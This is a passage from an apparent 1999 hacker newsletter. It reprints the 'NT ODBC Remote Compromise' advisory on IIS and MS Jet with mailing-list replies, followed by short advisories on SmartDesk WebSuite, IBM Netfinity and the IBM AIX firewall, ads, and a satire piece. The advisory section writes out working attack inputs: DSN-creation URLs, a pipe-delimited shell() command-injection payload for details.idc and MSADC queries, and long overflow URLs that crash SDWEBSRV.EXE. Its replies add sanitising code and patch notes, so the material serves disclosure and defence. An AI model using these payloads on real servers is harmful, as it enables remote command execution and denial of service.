- Ok, so let's get down to some nitty-gritty, real-life examples. We'll
- give a few that just demonstrate the problem....but since any
- script/application that gives user entered strings to the MS Jet ODBC DSN
- are vulnerable, we're not going to laundry-list them; rather, we'll show
- some of the more common cases we found.
-
- --[ Importance of the DSN
-
- Just some really quick background on ODBC & DSNs: an application
- 'connects' to the ODBC service specifying a specific DSN to query to. The
- DSNs are defined in the ODBC32 applet of the control panel. Each DSN is
- basically a description of the name of the DSN, the drivers to use (in our
- case, the MS Jet/Access drivers), and location of the actual database (a
- .mdb file somewhere in the filesystem). We could also have DSNs that used
- drivers such as Oracle or MS Sql, and the location would be another
- server. The whole point is that you only need to know the DSN name--ODBC
- will take care of where and how the actual database is to be used.
-
- So, great, these scripts query a DSN by name. Well, there are times were
- a server can have the scripts we mention, but when ran, you get an error
- saying DSN is not found. So now what? Well, if it's an IIS server, check
- for the existance of /scripts/tools/newdsn.exe. Yes, IIS includes CGI
- appliations *to make DSNs*. If the server doesn't have the DSN we need,
- we can just make it for them. We only need newdsn.exe, but it's possible
- to use a 'GUI' through getdrvrs.exe and dsnform.exe. Here's a flowchart:
-
- http://server/scripts/tools/getdrvrs.exe
- -> pick Microsoft Access Driver (*.mdb)
- -> Enter in the correct DSN name
- -> Enter a location for the .mdb, example: c:\web.mdb
- -> Submit
-
- This will create the DSN. If you want to be ultra-elite and do it the
- hard way, you can pass all the parameters to newdsn.exe like so:
-
- http://server/scripts/tools/newdsn.exe?driver=Microsoft%2B
- Access%2BDriver%2B%28*.mdb%29&dsn=DSN_name&dbq=c:\web.mdb&
- newdb=CREATE_DB&attr=
-
- **all one line, no spaces
-
- Where dsn is the name you want, and dbq is the file location. So for all
- the examples, we'll include the DSN name, just in case you have to create
- it.
-
- --[ IIS Sample Applications
-
- According to Russ Cooper of NTBugtraq, sample application problems are
- stupid and we shouldn't waste our time talking about them. He's already
- denied posts from myself, David Litchfield, and others. So, if you lived
- in Russ's little world, you won't have any of the following sample apps
- installed on your server, so you should just stop reading this article
- right now. But for those of you who realize it's just not that simple,
- perhaps you can learn something here. Also note this goes beyond sample
- scripts--they're just being used as a command reference example.
-
- Anyways, a good example script is
-
- http://server/scripts/samples/details.idc?Fname=&Lname=
-
- stick your shellcode in for either Fname or Lname, like so:
-
- details.idc?Fname=hi&Lname=|shell("cmd+/c+dir")|
-
- This uses DSN named "Web SQL" (notice the space). However, this causes
- problems, because the actual table must be initialized in the DSN. Never
- pheer, scripts are here! Run
-
- http://server/scripts/samples/ctguestb.idc
-
- after you create the DSN (if you had to) and before you run details.idc
-
- --[ MSADC (IIS 4.0)
-
- Starting with IIS 4.0, Microsoft bundled a way to do remote SQL queries on
- a DSN simply by interfacting via HTTP to a specific .dll. Bug? Hole?
- Nope, in the documentation Microsoft states that having MSADC installed
- could lead to security problems.
-
- The particular .dll is at
-
- http://server/msadc/msadcs.dll
-
- Now the particular problem is that there's a slightly custom way to
- interface to the .dll, using multipart-forms. So it's beyond the scope of
- just typing in a paramter by hand. So there's two options.
-
- One is to see if the server also has the (optional) interface installed.
- Check out for the existance of
-
- http://server/msadc/samples/adctest.asp
-
- ** Note: you have to use Internet Explorer 4.0+ for this
-
- This will give you a Java/Javascript interface that allows you to specify
- the DSN, uid/password, and SQL string to execute. Note that you'll have
- to obtain the table structure for the DSNs mentioned herein, because
- you'll need to construct a valid SQL statement.
-
- The other option is to obtain those files yourself from another server, or
- download and install the MS RDS/ADO/ADC components. Look at
-
- http://www.microsoft.com/data/ado/
-
- for more info and where to download.
-
- ** One note is that the Java interface lets you specify which server to
- use. So you can open the interface locally, off your own server, or find
- it on server 1, and specify to run SQL commands against whatever DSN on
- server 2.
-
- The one caveat is that error information is not displayed. It helps to
- have a sniffer going to see if what ODBC error messages are returned, if
- any. If you don't get a record listing, you might want to see what the
- error was.
-
- Now, what to do?
-
- You can obviously just execute SQL commands that contain the pipe
- character. For instance:
-
- Connection: DSN=AdvWorks
- Query: Select * from Products where ProductType='|shell("")|'
-
- ** Insert your shellcode in the shell() function
-
- --[ Sign-Off
-
- Well, I'm sure that's enough to chew for a bit. Sorry, the examples
- weren't as in-depth as usual--you'll just have to be satisfied with
- theory. :)
-
- Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
-
- .rain.forest.puppy. [WireTrip] rfp@wiretrip.net
- .many thanks to Matthew for working on this project together. :>
- .greetings to (#!)ADM, (#)Rhino9, and Phrack
- .special thanks to joewee & antilove for giving me a hard time; stran9er
- .for all the fun chats and setting me straight; and everyone else I forgot
- .before these greets become longer than the advisory. :) Oh, and el8.org rox.
-
- --[ This advisory is ISO 31337 certified. Fact of life: ADM > *
-
- ----------------------------------------------------------------------------------
-
- Date: Tue, 25 May 1999 22:00:42 +0100
- From: Vittal Aithal <vittal.aithal@REVOLUTIONLTD.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: Advisory: NT ODBC Remote Compromise
-
- [ The following text is in the "iso-8859-1" character set. ]
- [ Your display is set for the "US-ASCII" character set. ]
- [ Some characters may be displayed incorrectly. ]
-
- Here's some javascript stuff that'll clean up quotes and things before
- having them sent off in a sql query... only tested with access, so YMMV.
-
- function cleanSql (str) {
- var newStr = "";
- str = "" + str;
- var oneChar = (str.length == 1);
- if (str.length == 0) { return "null"; }
- for (var i = 0; i < str.length; i++) {
- var repStr = "";
- if (str.charAt(i) == "'") { newStr += "''"; }
- else if (str.charAt(i) == "|") { repStr = 124; }
- else if (str.charAt(i) == "\"") { repStr = 34; }
- else { newStr += str.charAt(i); }
- if (repStr) {
- if (i == 0 && !oneChar) {
- newStr += "CHR(" + repStr + ") &'";
- } else if (i == str.length - 1 && !oneChar) {
- newStr += "' & CHR(" + repStr + ")";
- } else if (!oneChar) {
- newStr += "' & CHR(" + repStr + ") & '";
- } else {
- newStr += "CHR(" + repStr + ")";
- }
- }
- if (!repStr && i == 0) {
- newStr = "'" + newStr;
- }
- if (!repStr && i == str.length - 1) {
- newStr += "'";
- }
- }
- return newStr;
- }
-
- not elegant, but it does work, and stop |'s getting through.
-
-
-
- bye
- vittal
-
- --
- Vittal Aithal
- Revolution Ltd <tel: 0181 267 1000> <fax: 0181 267 1066>
- <vittal.aithal@revolutionltd.com> <http://www.revolutionltd.com/>
- <vittal.aithal@bigfoot.com> <http://www.bigfoot.com/~vittal.aithal/>
-
- ----------------------------------------------------------------------------------
-
- Date: Tue, 25 May 1999 14:43:25 -0700
- From: Bigby Findrake <bigby@HOME.SHIVA.EU.ORG>
- To: BUGTRAQ@netspace.org
- Subject: Re: Advisory: NT ODBC Remote Compromise
-
- On Tue, 25 May 1999, Vittal Aithal wrote:
-
- > Here's some javascript stuff that'll clean up quotes and things before
- > having them sent off in a sql query... only tested with access, so YMMV.
-
- Do keep in mind that while this will stop people from using the
- aforementioned exploits *only when using your forms*. It is still
- possible to download your web pages, remove the javascript hooks, and then
- submit their information, or call the CGI(if method GET is accepted) by
- hand and get around such security measures.
-
- ----------------------------------------------------------------------------------
-
- Date: Wed, 26 May 1999 09:01:26 +0100
- From: Vittal Aithal <vittal.aithal@REVOLUTIONLTD.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: Advisory: NT ODBC Remote Compromise
-
- Just to clarify my earlier posting;
-
- The code I posted was server-side ASP Javascript. As a number of people
- have/will point out, running it at the client isn't going to help.
-
- I suspect the same methodology could be applied for other environments
- (coldfusion / perl DBI::DBD / php / etc).
-
-
- cheers
- vittal
-
- ----------------------------------------------------------------------------------
-
- Date: Wed, 26 May 1999 18:56:05 +0200
- From: Bronek Kozicki <bronek@wpi.com.pl>
- To: BUGTRAQ@netspace.org
- Subject: Re: Advisory: NT ODBC Remote Compromise
-
- Hello
-
- I have run some testing. Seems to me that this error has been repaired in
- MSJET40, but exists in MSJET35. Effectively, if Jet 4 is installed (and it's
- used by ODBC) ther's no problem with .IDC files. If one does not have Jet 4
- and is using .IDC to open Jet databases (I have not verified this) I belive
- this is dangerous situation, described by Matthew Astley.
-
- Because MS Access 97 is using Jet 3.5 (even if Jet 4 is installed), the
- problem still can be seen there.
-
- If instead of .IDC (which is considered obsolete) one is using .ASP + ADODB,
- and ADODB provider used is "Microsoft.Jet.OLEDB.3.51" (i.e. older than
- "4.0") then problem still exists.
-
- It's worthy to notice that SQL implementation used in both Jet 4 and Jet 3.5
- is little different. Thus applications (in some situations) cannot be simple
- ported from one to another. One thing I found is different handling of
- single- and double-qoute character. MS still have not documented differences
- (or I had no luck to find it). AFAIK MS Jet 4 comes with Microsoft Data
- Access 2.1 (MSDAC21).
-
- Details:
-
- System: WinNT Wrkst 4 US, SP5 , IE5 , IIS 4 (Option Pack), ODBC MS Access
- Driver 4.00.3513.00, other (cursor library, administrator etc.) ODBC files
- 3.510.3711.0
- Database: Access 97, Jet 3.51.2026.0 (I have also Jet 4.00.2115.25
- installed, but Access 97 uses older version)
- Table "guests" as described in Web SQL.
- Query "SecurityTest" as bellow:
- SELECT FirstName, LastName FROM Guests WHERE LastName =
- '|Shell("notepad.exe",1)|';
-
- What happens:
- - If I open the query under MS Access, it opens Notepad app and shows the
- (empty) resultset. So far mentioned SQL "feature" works.
-
- - If I use MSQRY32.EXE to open the database (), nothing more happen than
- showing the resultset (empty one). The same if I run SQRY32 from within MS
- Excel ("Get Externala Data")
-
- - I created TEST.IDC file as bellow (and TEST.HTX, of course):
- Datasource: Web SQL
- Username: sa
- Template: details.htx
- SQLStatement:
- +SELECT FirstName, LastName
- +FROM SecurityTest
- and opened it through HTTP. The only result is an empty resultset. I checked
- list of processes (using TLIST.EXE) and notepad was not run.
-
- - I created TEST2.IDC file as bellow:
- Datasource: Web SQL
- Username: sa
- Template: details.htx
- SQLStatement:
- +SELECT FirstName, LastName
- +FROM Guests
- +WHERE LastName <> '|Shell("notepad.exe",1)|'
- the same. Notepad did not run.
-
- - I created very simple .ASP
- <HTML>
- <HEAD>
- <%
- Param = Request.QueryString("Param")
- Data = Request.QueryString("Data")
- %>
- </HEAD>
-
- <BODY>
- <%
- Set Conn1 = CreateObject("ADODB.Connection")
- 'strConn = "Provider=Microsoft.Jet.OLEDB.3.51;Data
- Source=c:\temp\test.mdb;Mode=Read"
- strConn = "Provider=Microsoft.Jet.OLEDB.4.0;Data
- Source=c:\temp\test.mdb;Mode=Read"
- strSQL = "SELECT FirstName , LastName FROM SecurityTest"
-
- Conn1.Open strConn
- Set RSet1 = Conn1.Execute(strSQL)
- RSet1.Close
- Conn1.Close
- %>
- </BODY>
- </HTML>
- Notice that there are 2 connection strings, one is used and the other
- commented out. Upper connection string ("Provider=Microsoft.Jet.OLEDB.3.51")
- is UNSAFE. When I opened .ASP it started NOTEPAD.EXE in the context of WWW
- server. If WWW client can type-in any literal into HTML form, pass it to
- .ASP application (for exaple to be used in "WHERE" clause) and it remains
- non-parsed, then he/she will be able to run ANY code in the context of
- LocalSystem. If such a WWW server is also domain controller ... well, I'm
- bit scared to think about. Lower connection string
- ("Provider=Microsoft.Jet.OLEDB.4.0") seems to be safe.
-
- I hope somebody can verify my tests. Most important point is that while .IDC
- files are using current ODBC it strongly depends on configuration of the
- system. If Jet 4 is installed and is used by ODBC, we are safe. The same
- applies to .ASP + ODBC. On the other side is .ASP + ADODB, where Jet engine
- can be explicitly selected. If Jet older than 4 is used then we have
- dangerous situation. Fortunately in .ASP we can easily parse strings passed
- >from WWW client (like Vittal Aithal did in JavaScript, but function will be
- run on the server side).
-
- Regards.
-
-
- Bronek Kozicki
-
- --------------------------------------------------
- ICQ UID: 25404796 PGP KeyID: 0x4A30FA9A
- 07EE 10E6 978C 6B33 5208 094E BD61 9067 4A30 FA9A
-
-
-
- : -----Original Message-----
- : From: Bugtraq List [mailto:BUGTRAQ@NETSPACE.ORG]
- : Sent: Tuesday, May 25, 1999 9:00 PM
- : To: BUGTRAQ@NETSPACE.ORG
- : Subject: Advisory: NT ODBC Remote Compromise
- :
- :
- : --[ Advisory: NT ODBC Remote Compromise
- :
- : --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
- : --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
- :
- : --[ Brief Summary
- :
- : MS Jet database engine (which runs Access databases) allows an individual
- : to embed VBA in string expressions, which may allow the individual to run
- : commandline NT commands. This, combined with the flaw of IIS running ODBC
- : commands as system_local allow a remote attacker to have full control of
- : the system. Other webservers may be affected. Many MS Jet engines are
- : affected, but may not lead to elevated priviledges.
-
- Here's something that does not work for me. ODBC is not using Jet "feature"
- run embed VBA expression. It seems to use different database engine.
-
- : --[ Background
- :
- : ODBC allows a program flexible access to one or more relational databases
- : using SQL. If a client fails to quote correctly the meta characters in a
- : piece of data used in an SQL query, an attacker may be able to interfere
- : with the tables in the database (see MS SQL appension 'feature' in Phrack
- : 54, article 8).
-
- That's true, but not connected to the subject. Attacker seems not to use
- Jet, while "feature" exists just there. At least on my system.
-
- : However, the Microsoft "Jet" database engine (aka MS Access) provides some
- : extensions to SQL which allow the execution of VBA (Visual Basic for
- : Applications). This makes holes in meta character quoting code much more
- : interesting and dangerous.
-
- That's true.
-
- [cut]
-
- ----------------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 15:48:48 -0400
- From: Russ <Russ.Cooper@RC.ON.CA>
- To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
- Subject: Re: Advisory: NT ODBC Remote Compromise
-
- I've had 2 individuals suggest that MDAC 2.1 solves the problems
- described by rfp@wiretrip.net regarding NT ODBC and Access. There is
- also another message on Bugtraq suggesting the same thing.
-
- Daryl Banttari [daryl@windsorcs.com] reports that Allaire's ColdFusion
- product is vulnerable to the same attack when using Access datasources,
- but appears not to be vulnerable after installing MDAC 2.1.
-
- I could put a direct link here to MDAC 2.1, but the fact is that you
- should not simply upgrade to it without understanding what it changes
- (and what effect those changes may have on your existing environment).
- So instead, I give you;
-
- http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm
-
- which has a ton of information about the MDAC 2.1 release.
-
- Cheers,
- Russ - NTBugtraq Editor
-
- ----------------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 17:20:45 -0500
- From: Jesper M. Johansson <jesper.m.johansson-1@UMN.EDU>
- To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
- Subject: Re: Advisory: NT ODBC Remote Compromise
-
- >I could put a direct link here to MDAC 2.1, but the fact is that you
- >should not simply upgrade to it without understanding what it changes
- >(and what effect those changes may have on your existing environment).
- >So instead, I give you;
- >
- >http://www.microsoft.com/data/MDAC21info/MDAC21GAmanifest.htm
-
- If you are using Excel data sources and are updating data in them you will
- want to keep in mind that upgrading to MDAC 2.1 will break those data
- sources. MDAC 2.1 no longer supports the update method for Excel data
- sources. This will, for example, cause Cold Fusion to access violate, and
- often causes crashes in InetSrv.exe if you are using IIS. Unfortunately, MS
- forgot to mention that in the document Russ pointed to.
-
- Jesper
-
- Jesper.M.Johansson-1@umn.edu
- Ph.D. Candidate, University of Minnesota
- Editor, SANS NT Digest
- MCSE , MCP + I
- http://ids.csom.umn.edu/jesper
- "Juris Praecepta sunt haec: honeste vivere,
- alterum non laedere, suum cuique tribuere"
- Ulpian
-
- @HWA
-
- 53.0 Advisory: Buffer overflow in SmartDesk WebSuite v2.1
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Advisory: Buffer overflow in SmartDesk WebSuite v2.1
- Platforms Affected: Windows NT, Windows 98
- Found by: cmart (cmart@staticusers.net)
- Date: 5/23/99
-
- Description:
- -----------
- WebSuite v2.1 will crash when an additional 250+ characters
- is appended after the sites URL on NT Server 4 and NT
- Workstation 4 boxes.
-
- Running on top of Windows 98 it will crash with 150+ characters
- appended after the sites URL.
-
- After reinstallating on both platforms several times, the
- overflow string length varied. Approximately 1 out of 8 times
- the overflow string went from 150 chars (Win98) to about
- 1000+ chars. It also went from 250+ chars (NT) to about
- 2000+ chars.
-
- After the server crashes on NT Workstation 4, it's unable
- to find the lib file sysclass.flb. (On our tests).
-
- Details:
- -------
- [Windows NT]
- http://hostname/00000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000
- 00000000000000000000000000
-
- SDWEBSRV.EXE crashes.
-
- [Windows 98]
- http://hostname/00000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000
- 0000000000000000000000000000000000000000000000
-
- SDWEBSRV.EXE crashes.
-
- -----------------------------
- cmart | cmart@staticusers.net
- http://winntsec.com
- -----------------------------
-
- @HWA
-
- 54.0 Security Leak with IBM Netfinity Remote Control Software
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Tue, 25 May 1999 13:05:56 -0400
- From: Russ <Russ.Cooper@RC.ON.CA>
- To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
- Subject: Security Leak with IBM Netfinity Remote Control Software
-
- On May 10th, 1999, Thomas Krug reported to NTBugtraq;
-
- >Hi,
- >
- >I found a method to run programs like regedit and user manager with
- >admin right using the above tool. The following testscenario has
- >been used:
- >
- >PC with Windows NT Workstation in a Domain
- >Registry has been secured (especially HKLM)
- >The User has no local admin rights and is in no admin group.
- >The execution of regedit and regedt32 has been forbidden by system
- >policy.
- >
- >When running the Netfinity Client and starting the process manager
- >(view, close and execute processes) and run for instance
- >regedit.exe or musrmgr.exe the programs run under the user
- >configured with the netfinity service, either the system account
- >or an admin.
- >
- >Thomas
-
- After an incredibly difficult journey through the labyrinth of IBM's
- support groups, I finally spoke to a Ted McDaniels who, reportedly, was
- responsible for support of the IBM Netfinity RCS.
-
- After explaining Tom's issues with the product, Ted acknowledged that
- IBM Netfinity RCS was "built with very little security in mind". He also
- expressed doubt that any "fix" might be made to it to give it even the
- most rudimentary NT security understandings.
-
- IBM did promise to send some sort of explanation to NTBugtraq regarding
- Thomas' findings, however, Ted has now gone on vacation and we're left
- with nothing from them.
-
- Can you detect how disappointed I am with IBM's reaction and handling of
- this issue?
-
- Thomas' company was in the process of ripping out IBM Netfinity RCS when
- he originally submitted the issue, and all indications are that anyone
- using IBM Netfinity RCS, or considering using it, should do the same.
-
- Bottom line, there is no way to control what a user can or cannot do
- with the "Process Manager" component of IBM Netfinity RCS, and clearly
- they are able to usurp all other controls you might have placed on your
- NT environment should the product be present. The service *must* be run
- as either SYSTEM or ADMINISTRATOR.
-
- If anyone has found a way to avoid the *HUGE SECURITY HOLE* this product
- creates in an NT environment, please let us know.
-
- Cheers,
- Russ - NTBugtraq Editor
-
- @HWA
-
- 55.0 IBM eNetwork Firewall for AIX
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Tue, 25 May 1999 20:33:53 +0100
- From: Paul Cammidge <paul@PCCC.CO.ZA>
- To: BUGTRAQ@netspace.org
- Subject: IBM eNetwork Firewall for AIX
-
- The IBM eNetwork Firewall for AIX contains some poorly written scripts,
- which create temporary files in /tmp without making any attempt to
- validate the existance of the file. This allows any user with shell
- access to such a firewall to corrupt or possibly modify system files by
- creating links, pipes, etc with the same name.
-
- In a simple example submitted to IBM, /etc/passwd was overwritten. This
- example has been published on one of their support web pages as a 'local
- fix'.
-
- The problem was reported to IBM early in January. To the best of my
- knowledge, the correct procedures have been followed. Initially, IBM
- responded by telling me that it was common practice for software to make
- use of /tmp. They suggested changing the permissions to prevent users
- >from creating symbolic links to sensitive files.
-
- An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
- fix has not yet been released. This definately applies to version 3.2,
- and probably others.
-
- Anyone running this software and has users with shell accounts should be
- aware that the potential exists for these users to corrupt files which
- they dont have access to.
-
- cheers
- paul
-
- --------------------------------------------------------------------------
-
- Date: Sat, 29 May 1999 00:29:25 +0200
- From: Marc Heuse <marc@SUSE.DE>
- To: BUGTRAQ@netspace.org
- Subject: Re: IBM eNetwork Firewall for AIX
-
- Hi Paul,
-
- > The IBM eNetwork Firewall for AIX contains some poorly written scripts,
- > which create temporary files in /tmp without making any attempt to
- > validate the existance of the file. This allows any user with shell
- > access to such a firewall to corrupt or possibly modify system files by
- > creating links, pipes, etc with the same name.
-
- your are right, all their scripts have got link vulnerabilities ...
-
- > The problem was reported to IBM early in January. To the best of my
- > knowledge, the correct procedures have been followed. Initially, IBM
- > responded by telling me that it was common practice for software to make
- > use of /tmp. They suggested changing the permissions to prevent users
- > from creating symbolic links to sensitive files.
-
- when I found these in an audit at a customer in february, I opened an APAR
- too, but then discovered yours. When I saw that yours was opened a month
- before mine and not being dealt with, I made noise at IBM management and
- the AIX Security Team, that they issued an emergency fix.
- But this fix only available for those who know that it exists - anyway, the
- quick fix still has /tmp races all over the place - they just added "rm -f
- file" the line before writing into it ....
-
- > An APAR (IR39562) was opened on 18/01/99 and closed on 13/03/99. The
- > fix has not yet been released. This definately applies to version 3.2,
- > and probably others.
-
- I heard that the next IBM Firewall version will fix this ... bah - maybe
- with that quick "fix" ...
-
- But to set one thing straight: It's *not* IBM's fault. The IBM Firewall is a
- product of another company called Raleigh (I hope thats spelled correctly).
- In fact, the IBM AIX Security Team, especially Troy Bollinger, was very
- helpful and getting a fix - a correct one - out. It's the other company
- who writes security software but really seems to have no knowledge.
- sad but true
-
- Greets,
- Marc
- --
- Marc Heuse, SuSE GmbH, Schanzaeckerstr. 10, 90443 Nuernberg
- E@mail: marc@suse.de Function: Security Support & Auditing
- "lynx -source http://www.suse.de/~marc/marc.pgp | pgp -fka"
- Key fingerprint = B5 07 B6 4E 9C EF 27 EE 16 D9 70 D4 87 B5 63 6C
-
- @HWA
-
-
-
- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- *****************************************************************************
- * *
- * ATTRITION.ORG http://www.attrition.org *
- * ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
- * ATTRITION.ORG DoS Database, Crypto Archive *
- * ATTRITION.ORG Sarcasm, Rudeness, and More. *
- * *
- *****************************************************************************
-
- <img src="http://www.csoft.net/~hwa/canc0n.gif"> <br> Come.to/Canc0n99</a>
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:j
- http:/ 99 http:o
- http:/ login: sysadmin n99 httpi
- /come. password: tp://comn
- to/Can me.to/Cat
- c0n99 SYSTEM NEWS: Canc0n99 is looking for more speakers and Canc0n99h
- http:/ industry people to attend with booths and talks. 99 http:e
- /come. you could have a booth and presentation for the cost of p://comel
- http:/ little more than a doorprize (tba) contact us at our main n99http:i
- http:/ address for info hwa@press.usmc.net, also join the mailing n99http:s
- http:/ for updates. This is the first Canadian event of its type invalid t
- 403 Fo and will have both white and black hat attendees, come out logged! !
- 404 Fi and shake hands with the other side... *g* mainly have some IP locked
- ome.to fun and maybe do some networking (both kinds). see ya there! hostname
- http:/ x99http:x
- o/Canc x.to/Canx
- http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99http:x
- o/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canx
- http://come.to/Canc0n99 http://come.to/Canc0n99 http://come.to/Canc0n99
- <a href="http://come.to/Canc0n99">Canc0n99</a> <a href="http://come.to/Canc0n99">Canc0n99</a>
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
-
- $$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$$
- ! !
- $ $
- ! *** IT HAS BEEN FOUR YEARS! *** FREE KEVIN MITNICK NOW!!!! ** !
- $ $
- ! !
- $$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$$$?$?$??$??$??$????$$$?$$$?$$$?$$$?$$$?$
-
- www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
- n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
- m www.2600.com ########################################ww.2600.com www.freeke
- vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
- com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
- kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic
- k.com www.2600.########################################om www.2600.com www.fre
- ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
- k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
-
- <a href="http://www.2600.com/">www.2600.com</a>
- <a href="http://www.kevinmitnick.com></a>
-
- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
- * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
- * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
- <a href="http://www.csoft.net">One of our sponsers, visit them now</a> www.csoft.net
- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-
- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
- * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
- * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-
- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
- * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
- * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
-
-
- //////////////////////////////////////////////////////////////////////////////
- // To place an ad in this section simply type it up and email it to //
- // hwa@press,usmc.net, put AD! in the subject header please. - Ed //
- //////////////////////////////////////////////////////////////////////////////
-
-
- @HWA
-
- HA.HA Humour and puzzles ...etc
- ~~~~~~~~~~~~~~~~~~~~~~~~~
- Don't worry. worry a *lot*
-
- Send in submissions for this section please! .............
-
- -----------------------------/-----------------------------
-
-
- http://www.segfault.org/story.phtml?mode=2&id=36faccb8-03739440
-
-
-
-
- NATO authorizes airstrikes on hackers
-
- Silicon Valley, California -- Chat rooms were unusually deserted, spammers went on panicked last-minute
- mail-bombing sprees and bomb shelters filled to overflowing today as gloom engulfed hackers waiting for
- NATO strikes.
-
- Hackers showed a mix of fear and defiance toward the Western military alliance, aware it could strike at any
- moment against strategic hacker targets after yet another embarrassing vandalism of a U.S. Department of
- Defense website.
-
- "This waiting for strikes is killing me," said w4r3z_f14r3, a 22-year-old student in the controversial Computer
- Science department at the Massachusetts Institute of Technology. "If they want to bomb us, they should do it
- now so I can get back to cracking Afterlife II."
-
- Graphics illegally uploaded to an Associated Press website accompanied a note which stated, "F1n1$h 7h1Z
- 60mb1n9 0r f4c3 my uur47h, I 4m l337!!! H4x0rs un173!" The web server was quickly downed in a flurry of
- flamewars over the proper use of the word 'hacker' versus 'cracker' in the page.
-
- Many college-age hackers stayed home rather than attending school, though most admit they would have
- stayed home anyway.
-
- Y2K websites issued detailed FAQs to threatened hackers in case of bombing, including information on how
- long canned goods stay fresh in underground shelters, how to fix a misfiring diesel generator, and how to sow
- grain in the field with a plow and oxen.
-
- Bomb shelters, unused in emergency since DefCon 4, were cleaned up during the last NATO threat in August,
- when the alliance previously announced its intention to launch airstrikes at the notorious hacker group Cult of
- the Dead Cow. Most shelters have been turned into underground bunkers featuring ISDN lines with
- triple-redundancy backups, as once the hackers moved in, they found the absence of sunlight and social
- involvement enjoyable.
-
- Despite the danger, supporters of hard-line hackers were defiant.
-
- "NATOns will fire their missiles from a distance," said Lord Kreel, an NT cracker. "Meanwhile, I will be
- cracking into the Pentagon with my friends in the Lackeys of Terror. We plan to install Windows on all of their
- computers, which will cripple their systems beyond repair."
-
- Opponents of "black hat" hacking think NATO strikes will actually increase the popularity of cracking among
- the techno-elite, but cement the popular image of the hacker as a no-good techie pirate bent on stealing credit
- card numbers and eating babies.
-
- "Now, [crackers will] attack all the media sites, plastering the entire web with links to porno and warez sites,
- and lag the whole net to hell", said hacker Frodo Majere. "If NATO thinks they will bend hackers with bombs,
- they are dead wrong."
-
- Supporters of the infamous jailed hacker Kevin Mitnick have reportedly been preparing to strike at well-known
- pro-NATO companies and military organizations as soon as the first NATO bomb lands on hacker territory.
-
- "We'll introduce Y2K bugs to systems where you'll never find them. We will end the disgusting
- greed-infested system of monopolist capitalism by freeing information forever. Linux is the One, True God,"
- said one hacker, before he was shot and killed by an enraged fanatic wearing a red "GNU NOT Linux"
- headband, symbol of the underground terrorist organization FSF. A press release issued by the FSF's guerilla
- leader, known only as RMS, claimed responsibility for the killing.
-
- NATO's secretary-general Javler Selena authorized airstrikes against known hacker sites on Tuesday, after
- hackers on the IRC channel #2600 rebuffed a last-ditch peace offer and gave out free root accounts on the
- whitehouse.gov server.
-
- "In the past, computer security was a war of escalation between system administrators and joy-riding
- hackers," said a spokesperson for the anti-hacker group Freedom Through Oppression. "It's high time we
- brought the war to the instigators and bombed these hacker scum back to the Stone Age. To make the Internet
- safe for everyone, we must squash dissension once and for all. Countries have been nuked for less."
-
- "If you don't stand up to the theft of intellectual property of innocent companies such as SysMicrosoft and
- AppMicrosoft, you threaten American competitiveness and the ability to innovate," said President Gates, as
- he sought -- and got -- support from congressional leaders for military action.
-
- "We must halt the hackers and save the Internet for our children and the future of our country. The dirty,
